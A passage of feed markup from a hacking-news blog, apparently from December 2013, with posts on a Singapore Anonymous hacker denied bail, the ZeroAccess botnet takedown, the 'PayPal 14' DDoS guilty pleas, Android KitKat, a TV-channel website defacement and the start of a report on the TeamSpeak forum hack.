<span style="font-size: large;"><b>Anonymous</b> Hacker <b><span style="color: red;">Denied Bail</span></b> in <b>Singapore</b>, Accused For <i>Hacking Prime Minister Website</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCUO9sF-W6UHEY5vJ_wewr8KQKJ-1qYqDCA7EQ8s1KTWPhc_1Ky6FA_dIcmDVUnAInq8ITNcpoDheZTAVuXme3Q_1A2ypydvkkdATtz67sCR_sddBovK0KM28KOGgTD7mfcg2VKNWv-9M/s1600/anonymous-hacker-denied-bail-in-singapore.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCUO9sF-W6UHEY5vJ_wewr8KQKJ-1qYqDCA7EQ8s1KTWPhc_1Ky6FA_dIcmDVUnAInq8ITNcpoDheZTAVuXme3Q_1A2ypydvkkdATtz67sCR_sddBovK0KM28KOGgTD7mfcg2VKNWv-9M/s400/anonymous-hacker-denied-bail-in-singapore.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: justify;">
A Singapore <a href="http://www.voiceofgreyhat.com/search?q=court">court</a> has this week <a href="http://www.voiceofgreyhat.com/search?q=bail">denied bail</a> to an accused <a href="http://www.voiceofgreyhat.com/search?q=anonymous+hacker">Anonymous hacker</a> charged with hacking high-value government websites. Last month a Singaporean hacker named <b>James Raj</b> was extradited from <a href="http://www.voiceofgreyhat.com/search?q=Malaysia">Malaysia</a>. He was charged with hacking the <a href="http://www.amktc.org.sg/"><b>Ang Mo Kio district website</b></a>, whose MPs include <a href="http://www.pmo.gov.sg/"><b>Prime Minister Lee Hsien Loong</b></a>, under the banner of the world's most dangerous <a href="http://www.voiceofgreyhat.com/search?q=hacktivist">hacktivist</a> community, <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a>. The alleged hacking was among a string of <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">cyber attacks</a> that have also targeted the websites of <a href="http://www.pmo.gov.sg/%E2%80%8E">Premier Lee</a> and <a href="http://www.istana.gov.sg/">President Tony Tan</a> as well as pro-government media, in a row over Internet freedom in the city state. The 35-year-old hacker was deeply linked with <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a> and hid behind the nickname <b><span style="color: red;">"The Messiah".</span></b> District Judge Soh Tze Bian said Raj posed a flight risk because he previously jumped bail and fled to Malaysia after being slapped with illegal drugs consumption charges in 2011. </div>
<div style="text-align: justify;">
Police have previously said Raj was also linked to other hacking attacks, including on the website of a charity associated with the ruling <a href="http://www.pap.org.sg/">People's Action Party</a>. Two Singaporean men have so far been charged with defacing the president's website. Police have said that there are no links between Raj and these suspects. </div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/y1PF0VTOU6Q?feature=player_embedded' frameborder='0'></iframe></div>
<div style="text-align: justify;">
The round of attack from Raj took place three days before a self-proclaimed spokesperson for Anonymous appeared in a video on October 31 to demand the scrapping of a recent Singapore law requiring news websites to obtain annual licences. The Internet licensing rules, which came into effect in June, have sparked anger among bloggers and activists who say they are designed to muzzle free expression. Singapore strictly regulates the traditional media, but insists the recent licensing rules do not impinge on Internet freedom. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://www.globalpost.com/dispatch/news/afp/131204/singaporean-anonymous-hacker-denied-bail">Global Post</a>)</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-11249839004509427862013-12-08T01:14:00.001+05:302013-12-08T01:14:33.426+05:30Microsoft Along With FBI & EC3 Shattered The Notorious ZeroAccess Botnet<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: #3d85c6;">Microsoft</span></b> Along With <b><span style="color: blue;">FBI</span></b> &<b><span style="color: blue;"> EC3</span></b> Shattered The Notorious <b><i><span style="color: red;">ZeroAccess Botnet </span></i></b>Responsible For Infecting More Than <b>2 Million Computers</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHsqO5ApbcNgAc2R5AssJ3FVEp_gQsJMilyJZhpv3wC4JyoXH7NLc6tUALtLjy6drduMI20t3IcZElNQqiM7nfdYAemsRsi2eicBRn6Q1jmDIwo0PhxyqnjUGOOjOJrwvWvYjusMn4dSQ/s1600/microsoft-shattered-zerozccess-botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHsqO5ApbcNgAc2R5AssJ3FVEp_gQsJMilyJZhpv3wC4JyoXH7NLc6tUALtLjy6drduMI20t3IcZElNQqiM7nfdYAemsRsi2eicBRn6Q1jmDIwo0PhxyqnjUGOOjOJrwvWvYjusMn4dSQ/s400/microsoft-shattered-zerozccess-botnet.jpg" width="400" /></a></div>
Redmond-based software giant <a href="http://www.voiceofgreyhat.com/search/label/Microsoft">Microsoft</a> has yet again scored a huge success against a big racket of <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminal">cyber criminals </a>by shattering one of the world's largest and most rampant <a href="http://www.voiceofgreyhat.com/search?q=botnet">botnets</a>, named <b>'ZeroAccess'</b>. The <b>Sirefef botnet</b>, also known as ZeroAccess,<span style="color: red;"> is responsible for infecting more than 2 million computers</span>, specifically targeting search results on <a href="http://www.voiceofgreyhat.com/search?q=google">Google</a>, <a href="http://www.voiceofgreyhat.com/search?q=bing">Bing</a> and <a href="http://www.voiceofgreyhat.com/search?q=Yahoo">Yahoo</a> search engines, and is estimated to cost online advertisers <b>$2.7 million each month</b>. Tech giant <b>Microsoft</b>, working alongside the <b><a href="http://www.voiceofgreyhat.com/search?q=FBI">Federal Bureau of Investigation (FBI)</a></b> and <b><a href="http://www.voiceofgreyhat.com/search?q=EC3">Europol's European Cybercrime Centre (EC3)</a></b>, has successfully disrupted this <a href="http://www.voiceofgreyhat.com/search?q=botnet">notorious botnet</a>. This is Microsoft’s first botnet action since the Nov. 14 unveiling of its new <b>Cybercrime Center</b> — a center of excellence for advancing the global fight against cyber crime — and marks the company’s eighth botnet operation in the past three years. <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<div style="text-align: justify;">
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-2FhdoSNTb7hBOgKxucsAIk42_Ru5GeTtkOWOOTbpERrxM6VQcmq15Wvd2LoUeSfbhCy84qFlC0zaW5LM68tQGVp-XR_9-21mdzy2E8BMrDs01BveC7NP6b-XBo1OaivilemhI2yci0/s1600/cybercrime-center-microsoft.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc-2FhdoSNTb7hBOgKxucsAIk42_Ru5GeTtkOWOOTbpERrxM6VQcmq15Wvd2LoUeSfbhCy84qFlC0zaW5LM68tQGVp-XR_9-21mdzy2E8BMrDs01BveC7NP6b-XBo1OaivilemhI2yci0/s400/cybercrime-center-microsoft.jpg" width="400" /></a><i></i><br />
<div style="text-align: justify;">
<i><i>“This operation marks an important step in coordinated actions that are initiated by private companies and, at the same time, enable law enforcement agencies around Europe to identify and investigate the criminal organizations and networks behind these dangerous botnets that use malicious software to gain illicit profits,” </i>said Troels Oerting, head of the EC3. <i>“EC3 added its expertise, information communications technology infrastructure and analytic capability, as well as provided the platform for high-level cooperation between cyber crime units in five European countries and Microsoft.”</i></i></div>
</div>
<div>
Due to its botnet architecture, ZeroAccess is one of the most robust and durable botnets in operation today and was built to be resilient to disruption efforts, relying on a peer-to-peer infrastructure that allows cyber criminals to remotely control the botnet from tens of thousands of different computers. ZeroAccess is used to commit a slew of crimes, including search hijacking, which “hijacks” people’s search results and redirects people to sites they had not intended or requested to go to in order to steal the money generated by their ad clicks. ZeroAccess also commits click fraud, which occurs when advertisers pay for clicks that are not the result of legitimate, interested human users’ clicks, but are the result of automated Web traffic and other criminal activity. Research by the University of California, San Diego shows that as of October 2013, 1.9 million computers were infected with ZeroAccess, and Microsoft determined there were <b>more than 800,000 ZeroAccess-infected computers active on the Internet </b>on any given day.<br />
<br /></div>
<iframe frameborder="0" height="360" src="http://www.youtube.com/embed/BFxgzjL-el0" width="640"></iframe><br />
<div>
<br /></div>
<div>
<b><u>How It Happened:- </u></b></div>
<div>
<div>
Last week, Microsoft filed a civil suit against the cyber criminals operating the ZeroAccess botnet and received authorization from the U.S. District Court for the Western District of Texas to simultaneously block incoming and outgoing communications between computers located in the U.S. and the 18 identified Internet Protocol (IP) addresses being used to commit the fraudulent schemes. In addition, Microsoft took over control of 49 domains associated with the ZeroAccess botnet. A10 Networks provided Microsoft with advanced technology to support the disruptive action.</div>
<div>
As Microsoft executed the order filed in its civil case, Europol coordinated a multijurisdictional criminal action targeting the 18 IP addresses located in Europe. Specifically, Europol worked with Latvia, Luxembourg, Switzerland, the Netherlands and Germany to execute search warrants and seizures on computer servers associated with the fraudulent IP addresses located in Europe. This is the second time in six months that Microsoft and law enforcement have worked together to successfully disrupt a prevalent botnet. It demonstrates the value coordinated operations have against cyber criminal enterprises. For more information about this botnet operation click <a href="http://www.microsoft.com/en-us/news/press/2013/dec13/12-05zeroaccessbotnetpr.aspx">here</a><br />
<br /></div>
</div>
<div>
ZeroAccess is a very sophisticated piece of malware that blocks attempts to remove it, so every Microsoft user is advised to click <b><a href="http://support.microsoft.com/botnets">Here</a></b> for detailed instructions on how to remove this threat. Because Microsoft found that the ZeroAccess malware disables security features on infected computers, leaving the computer susceptible to secondary infections, it is critical that victims rid their computers of ZeroAccess by using malware removal or antivirus software as quickly as possible. </div>
<div>
In conversation with the press, David Finn, executive director and associate general counsel of the Microsoft Digital Crimes Unit, said: “Microsoft is committed to working collaboratively — with our customers, partners, academic experts and law enforcement — to combat cybercrime. And we’ll do everything we can to protect computer users from the sinister activities and criminal networks that victimize innocent people and businesses around the world.” </div>
<div>
<br /></div>
<div>
While talking about the <a href="http://www.voiceofgreyhat.com/search?q=ZeroAccess">ZeroAccess botnet</a> takedown, I would like to remind you that in March last year <a href="http://www.voiceofgreyhat.com/search?q=Microsoft">Microsoft</a> successfully <a href="http://www.voiceofgreyhat.com/2012/03/microsoft-seized-two-command-control.html">shut down</a> two <a href="http://www.voiceofgreyhat.com/search?q=C&C">command and control (C&C) servers</a> of one of the world's most dangerous banking trojans, <b><a href="http://www.voiceofgreyhat.com/search?q=zeus">Zeus</a></b>.<br />
<br />
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://blogs.technet.com/b/microsoft_blog/archive/2013/12/05/microsoft-europol-fbi-and-industry-partners-disrupt-notorious-zeroaccess-botnet-that-hijacks-search-results.aspx">Microsoft Official Blog</a>)</span></div>
<div style="text-align: right;">
<span style="font-size: xx-small;"><br /></span></div>
</div>
</div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-72094972904937933102013-12-08T01:14:00.000+05:302013-12-08T01:14:22.366+05:30'PayPal 14' Culprits Enter Guilty Pleading Over Pro-WikiLeaks DDoS Attack Versus PayPal<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;">Accused <b>'PayPal 14'</b> Culprits of <b><span style="color: red;">Anonymous</span></b> Enter <b><span style="color: red;">Guilty Pleading</span></b> Over Pro-<b>WikiLeaks</b> <b><span style="color: red;">DDoS Attack</span></b> Versus <b>PayPal</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYgFyyuPBMx7s71Yq5GHZ7w-HLLvZP6cL6jtB5N70BmMEG2pTCtFbvu8okC0pJeDu4BYhbuufw5K8p3an7Co95zbLkDaUG0hHbhNv1ywkD7-FiuoQOoCvFACFOsIYAb5V0UComaWMUeU/s1600/PayPal14-ofanonymous-enter-guilty-ple.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYgFyyuPBMx7s71Yq5GHZ7w-HLLvZP6cL6jtB5N70BmMEG2pTCtFbvu8okC0pJeDu4BYhbuufw5K8p3an7Co95zbLkDaUG0hHbhNv1ywkD7-FiuoQOoCvFACFOsIYAb5V0UComaWMUeU/s400/PayPal14-ofanonymous-enter-guilty-ple.jpg" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I am quite sure that all of our regular readers still remember the <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">devastating cyber attack</a> from <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous </a>against <a href="http://www.voiceofgreyhat.com/search?q=paypal">PayPal</a>; the attack was conducted under the banner of <b><a href="http://www.voiceofgreyhat.com/search?q=Operation+PayPal">Operation PayPal (#OpPayPal)</a></b>. The infamous hacker community gave as the reason for this mass protest the online payment company's suspension of the <a href="http://www.voiceofgreyhat.com/search/label/wikileaks">WikiLeaks</a> account. #OpPayPal is considered one of the most <a href="http://www.voiceofgreyhat.com/2011/10/top-5-ddos-attacks-of-2011-exclusive.html">damaging cyber attacks</a> ever carried out in <a href="http://www.voiceofgreyhat.com/search?q=cyber+space">cyber space</a>. PayPal and law enforcement agencies immediately took steps and started an investigation; as a first step <a href="http://www.voiceofgreyhat.com/2011/08/paypal-sent-1000-ip-addresses-list-of.html">PayPal sent 1000 IP addresses</a> of Anonymous hackers who were linked to that attack to the <a href="http://www.voiceofgreyhat.com/search?q=FBI">FBI</a>. As expected, the hackers who were behind that <a href="http://www.voiceofgreyhat.com/search?q=attack">attack</a> were <a href="http://www.voiceofgreyhat.com/search?q=arrested">busted</a> one after another by the police. And finally the <a href="http://www.voiceofgreyhat.com/search?q=accused+hacker">accused </a>Anonymous hackers appeared in federal court in California on Thursday and will be formally <a href="http://www.voiceofgreyhat.com/search?q=sentenced">sentenced</a> in one year. 
Eleven of the so-called <b>“PayPal 14” </b>members each <a href="http://www.voiceofgreyhat.com/search?q=guilty">pleaded guilty</a> in court to one felony count of conspiracy and one misdemeanor count of damaging a computer as a result of their involvement in a <a href="http://www.voiceofgreyhat.com/search?q=DDoS">distributed denial-of-service (DDoS)</a> attack waged by <a href="http://www.voiceofgreyhat.com/search/label/anonymous">Anonymous</a> in late 2010 shortly after PayPal stopped processing donations to the anti-secrecy group WikiLeaks. Prosecutors say the defendants used a free computer program called the <b><a href="http://www.voiceofgreyhat.com/search?q=LOIC">Low Orbit Ion Cannon</a></b>, aka <b>LOIC</b>, to collectively flood PayPal’s servers with tremendous amounts of illegitimate internet traffic for one week that winter, at moments knocking the website offline as a result and causing what PayPal estimated to be<a href="http://www.voiceofgreyhat.com/2012/11/DDoS-Attack-From-Anonymous-Cost-PayPal-3.5-Million.html"> roughly £3.5 million in damages</a>. </div>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhziqnC7KcSe7tIdA_4fFwcRxsAex4pawY2Sob0Ind3ycuPyktXZ_j6x6BqUcG5rV1OMBZ0PLME1Uro-CIMAGzzK6-6OhzHhJQKungkU6TNKOu4ht2rb8IuMEbj0lqA1QgGDDTpmqvobW0/s1600/accused_PayPal_14.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhziqnC7KcSe7tIdA_4fFwcRxsAex4pawY2Sob0Ind3ycuPyktXZ_j6x6BqUcG5rV1OMBZ0PLME1Uro-CIMAGzzK6-6OhzHhJQKungkU6TNKOu4ht2rb8IuMEbj0lqA1QgGDDTpmqvobW0/s320/accused_PayPal_14.jpg" width="320" /></a>Pending good behavior, those 11 alleged Anons will be back in court early next December for sentencing, at which point the felony charges are expected to be adjourned. Two of the remaining defendants cut deals that found them <a href="http://www.voiceofgreyhat.com/search?q=guilty+pleading">pleading guilty</a> to the misdemeanor counts only, likely removing themselves from any lingering felony convictions but earning an eventual 90 day jail stint when they are finally sentenced. A fourth defendant, Dennis Owen Collins, did not attend the hearing due to complications involving a similar case currently being considered by a federal judge in Alexandria, Virginia, in which he and one dozen others are accused of conspiring to cripple other websites as an act of protest during roughly the same time.</div>
<div style="text-align: justify;">
<span style="text-align: justify;">In his press reaction defense attorney Stanley Cohen said the terms of the settlement were reached following over a year of negotiations, </span><i style="text-align: justify;">“based upon strength, not weakness; based upon principle, not acquiescence.</i><span style="text-align: justify;">” In the courtroom all the accused hackers stood up and said, </span><i style="text-align: justify;">‘We did what you said we did . . .We believe it was an appropriate act from us and we’re willing to pay the price.’</i><span style="text-align: justify;"> </span></div>
<div style="text-align: justify;">
On the other hand, Cohen, who represented PayPal 14 defendant Mercedes Haefer in court, said one of the hacktivists told him after Thursday's hearing concluded that <i>"This misdemeanor is a badge of honor and courage."</i> When the media questioned Michael Whelan, a lawyer for one of the defendants, he declined to comment on the plea. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: right;">
<span style="font-size: xx-small;">-Source (<a href="http://rt.com/usa/paypal-hackers-court-anonymous-787/">RT</a>)</span></div>
<div style="text-align: right;">
<span style="font-size: xx-small;"><br /></span></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-54794873691498406742013-12-07T00:33:00.000+05:302013-12-07T00:33:19.556+05:30Android 4.4 'KitKat' -The More Compatible, Intelligent and Simple Android Ever<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: lime;">Android 4.4 </span><span style="color: #660000;">'KitKat'</span></b> All You Need to Know-The More <b>Compatible</b>, <b>Intelligent</b> and <b>Simple</b> Android Ever </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBX2rJhdn_Onje7redpC_DPmNaO7eNrCpr3PKLX4YpfvsRLntjvNAVaZPRyR7LjoJABbcHHgprylcopB4A7_XefZ-EHXeqXCFuaEQh8P_wLkB81iz2iVGIUnOjrCaL3ReujRFWCM3BYTM/s1600/Android+4.4+KitKat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBX2rJhdn_Onje7redpC_DPmNaO7eNrCpr3PKLX4YpfvsRLntjvNAVaZPRyR7LjoJABbcHHgprylcopB4A7_XefZ-EHXeqXCFuaEQh8P_wLkB81iz2iVGIUnOjrCaL3ReujRFWCM3BYTM/s400/Android+4.4+KitKat.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We have discussed <a href="http://www.voiceofgreyhat.com/search?q=android">Android</a> several times before. It is one of the world's most popular and widely used operating systems, based on the <a href="http://www.voiceofgreyhat.com/search?q=Linux+kernel">Linux kernel</a> and mainly designed for <a href="http://www.voiceofgreyhat.com/search?q=smartphone">smartphones</a> and <a href="http://www.voiceofgreyhat.com/search?q=tablet">tablet computers</a>. Over the last four years we have seen various flavors of Android, among which 2.2 (Froyo), 2.3.3–2.3.7 (<a href="http://www.voiceofgreyhat.com/search?q=Gingerbread">Gingerbread</a>), 3.2 (<a href="http://www.voiceofgreyhat.com/search?q=Honeycomb">Honeycomb</a>), 4.0.3–4.0.4 (<a href="http://www.voiceofgreyhat.com/search?q=IceCream+Sandwich">Ice Cream Sandwich</a>) & 4.1.x-4.3.x (<a href="http://www.voiceofgreyhat.com/search?q=Jelly+Bean">Jelly Bean</a>) successfully drew public attention and gained popularity. After the success of Jelly Bean, Google has now introduced <b>Android 4.4</b>, nicknamed <b>'KitKat.'</b> The official Android website explained the reason for this nomenclature: <i>'as everyone finds chocolate so tempting, we decided to name the next version of Android after one of our favorite chocolate treats, the KitKat®!</i>' Immediately after its release Android 4.4 is in vogue, as with this version Google improved performance and memory usage, making it more compatible than ever; you can easily try KitKat on your older smartphones. Now let's look at Android 4.4 briefly:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Introduction:-</b></div>
<div style="text-align: justify;">
Readers, I will introduce in a simple way the new features of the new version of Android. KitKat comes with the most intelligent and simple search for Android, says the official Google blog, and, more importantly, should have compatibility with older devices. This means more people can have access to the innovations than with other Android updates.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Performance and improved use of memory:-</b></div>
<div style="text-align: justify;">
Many of the major changes in KitKat are under the hood. The overall performance should improve, especially in relation to RAM. The Android developers site says "KitKat streamlines all the key components to reduce memory consumption", so even older smartphones running Android 4.4 will be faster and more responsive - even with 512MB of RAM. Multitasking should work better and you can switch applications without locking up your smartphone.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Simpler and more powerful: (Google Now)</b></div>
<div style="text-align: justify;">
Google Now gains much prominence in KitKat, with quick access, more cards, and more hands-free features. Isn't it great to be able to wake up your smartphone to start a search and take a picture by saying only "OK Google Now"? It's like Google Glass, but on your smartphone.</div>
<div style="text-align: justify;">
Google Now will also gain space on your homescreen, if you want (you can slide left to right to find it), and Google will add more cards to make your smartphone smarter, automatically suggesting things based on your interests, location, and more.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Support SMS, location sharing, and animated GIFs in Hangouts:-</b></div>
<div style="text-align: justify;">
Google announced this week that Hangouts will become the main messaging app, covering text messaging, video calls and instant messaging. If you hate having your conversations scattered across several different apps, with KitKat you need only Hangouts, which replaces the old Mail app.</div>
<div style="text-align: justify;">
Location sharing can be very convenient when you're meeting a friend and want to tell them exactly where you are.</div>
<div style="text-align: justify;">
Finally, if you like to put emojis in messages, many are present in the new Google keyboard.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Improvements in NFC, Cloud Printing and File Management:-</b></div>
<div style="text-align: justify;">
KitKat also includes improvements that developers can now use to improve their apps. Regarding NFC, it may automatically take you to the right app when you tap your device on a payment terminal. Printer manufacturers can develop services to send print files from Android to your printer. And the new framework for access to storage provides a consistent way to access files stored by other services in other apps (e.g., open or save files in Dropbox or Box when you're in the browser).</div>
<div style="text-align: justify;">
In short, I wholeheartedly agree with Google in saying that KitKat 4.4 is smart, simple, and truly yours. To know more about <b>Android 4.4 'KitKat'</b> click <b><a href="http://www.android.com/versions/kit-kat-4-4/">here</a></b>.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: justify;">
While concluding this article, I on behalf of <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b>, want to thank our new guest editor <b><a href="http://www.voiceofgreyhat.com/search?q=Rafael+Souza">Mr. Rafael Souza</a></b>, for sharing his view and extensive thought on android 4.4. Rafael we love you. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-35357617307989722032013-12-05T02:35:00.001+05:302013-12-05T02:35:26.073+05:30DY365 TV -Popular Satellite Channel of Assam, India Hacked<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b><span style="color: red;">DY365 TV</span></b> -Popular <b>Satellite Channel</b> of <b>Assam</b>, India <b><span style="color: red;">Hacked </span></b>By <b><span style="color: red;">Dr41DeY </span></b>(Nigerian Cyber Army )</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUL2lJ51ExnhAJ0n6NNwm6fohSarTg3NtYVBb4vK-BOjJ2FsUL5z9xTNuV13PesYobmjLjR1GVnJKsVQ0Afaxl8rf9_JFiB94y8M7mQ6aFuYZ_oEFL2uxI6pqE9S6dyFGW62ImSev9xF0/s1600/Dy_365_TV_Hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUL2lJ51ExnhAJ0n6NNwm6fohSarTg3NtYVBb4vK-BOjJ2FsUL5z9xTNuV13PesYobmjLjR1GVnJKsVQ0Afaxl8rf9_JFiB94y8M7mQ6aFuYZ_oEFL2uxI6pqE9S6dyFGW62ImSev9xF0/s400/Dy_365_TV_Hacked.png" width="400" /></a></div>
<div style="text-align: justify;">
A <a href="http://www.voiceofgreyhat.com/search?q=hacker">hacker</a> going by the alias <b><a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">Dr41DeY</a></b>, from a hacker community named Nigerian Cyber Army, has struck again. After his much discussed hack of the <a href="http://www.voiceofgreyhat.com/2013/12/pakistan-peoples-party-website-hacked.html">Pakistan People's Party (PPP)</a>, this time he targeted yet another high-profile website, that of one of the leading 24-hour <a href="http://www.voiceofgreyhat.com/search?q=satellite+channel">satellite channels</a> of Assam, <a href="http://www.voiceofgreyhat.com/search?q=India">India</a>, named <b><span style="color: red;">'DY365 TV.'</span></b> While talking with a <a href="mailto:info@voiceofgreyhat.com">VOGH</a> representative, the hacker confirmed that by exploiting an undisclosed <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a> he managed to gain administrative access to the <a href="http://dy365.in/"><b>official website</b></a> of DY365 TV. But this time, without tampering with data, the hacker just left a <a href="http://www.voiceofgreyhat.com/search/label/defacement">message</a> on the home page saying <i>"Hacked By Dr41DeY @Nigerian Cyber Army."</i> As before, Dr41DeY created an <a href="http://gyazo.com/43027d1a22b6cb2ba86ed0bf93a2ca02">image archive</a> as proof of this hack. The <a href="http://www.voiceofgreyhat.com/search?q=cyber+attack">attack</a> took place on the 3rd of December; a couple of hours after the hack, DY365 authorities responded to the incident and restored their site, and sources confirmed that the <a href="http://www.voiceofgreyhat.com/search?q=security+hole">security hole</a> has also been patched. However, this popular Assamese broadcasting channel has refused to give any statement regarding this issue. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><u>Brief About DY365:-</u></b> It is a 24-hour satellite channel of Assam, India. DY365 broadcasts news in the Assamese, Hindi, Bengali and English languages. It was launched on October 30, 2008. DY365 is a unit of Brahmaputra Tele Productions Pvt. Ltd. Manoj Kumar Goswami is the editor-in-chief of the channel. The channel gained popularity in a very short span of time, and now it's recognized as one of the leading channels of North East India. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-20144257875572804992013-12-05T02:35:00.000+05:302013-12-05T02:35:24.066+05:30TeamSpeak Official Forum Hacked! Redirecting Users Into Malicious DotCache Exploit Kit<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="font-size: large;"><b>TeamSpeak</b> Official <b>Forum</b> <b><span style="color: red;">Hacked</span></b>! Infecting Users By <b>Malicious <span style="color: red;">DotCache Exploit Kit</span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKtQf2cA1wUHDi0nCpxlHkBHcQtDKf9CcDiQtfMs3u6lgIHHX-rnAb63Csiw5AsgYDF1QVasWFMDQAnKMoagtUTVYWTNnvkOu3vcL1Akgv5-MdwNFwgJwHxvx3shckzmkgfeEDdRIifbo/s1600/TeamSpeak-forum-hacked-malware-infected.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKtQf2cA1wUHDi0nCpxlHkBHcQtDKf9CcDiQtfMs3u6lgIHHX-rnAb63Csiw5AsgYDF1QVasWFMDQAnKMoagtUTVYWTNnvkOu3vcL1Akgv5-MdwNFwgJwHxvx3shckzmkgfeEDdRIifbo/s400/TeamSpeak-forum-hacked-malware-infected.png" width="400" /></a></div>
<div style="text-align: justify;">
A serious <a href="http://www.voiceofgreyhat.com/search?q=security+breach">security breach</a> has compromised the official forum of <b><a href="http://www.teamspeak.com/">TeamSpeak</a></b>. According to sources, <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> gained access to the server and injected a <a href="http://www.voiceofgreyhat.com/search?q=malicious+script">malicious script</a> into the landing page of the <a href="http://forum.teamspeak.com/">TeamSpeak official forum</a>. Expert <a href="http://www.voiceofgreyhat.com/search?q=malware">malware</a> analysts have figured out that the attack was thoroughly planned in order to infect millions of users by redirecting them to a <b><span style="color: red;">DotCache exploit kit</span></b> landing page, as illustrated below. </div>
<div class="separator" style="clear: both; text-align: center;">
